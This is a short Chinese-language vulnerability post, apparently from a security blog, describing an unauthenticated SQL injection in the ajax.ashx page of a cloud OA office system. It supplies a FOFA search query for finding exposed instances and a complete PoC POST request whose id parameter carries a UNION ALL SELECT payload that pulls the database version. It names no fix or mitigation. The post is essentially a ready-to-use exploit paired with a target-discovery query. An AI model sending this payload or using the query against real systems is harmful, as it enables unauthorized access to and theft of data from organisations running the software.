漏洞概述
—-
由于全程云0a办公系统 alax.ashx页面参数过滤不当,导致存在sq注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息.
复现环境
—-
FOFA语法:
body=”images/yipeoplehover.png”
漏洞复现
—-
>PoC
POST /OA/common/mod/ajax.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–+
![2024-01-05T19:35:07.png][1]
[1]: https://www.mhtsec.com/usr/uploads/2024/01/3909161076.png
请登录后查看评论内容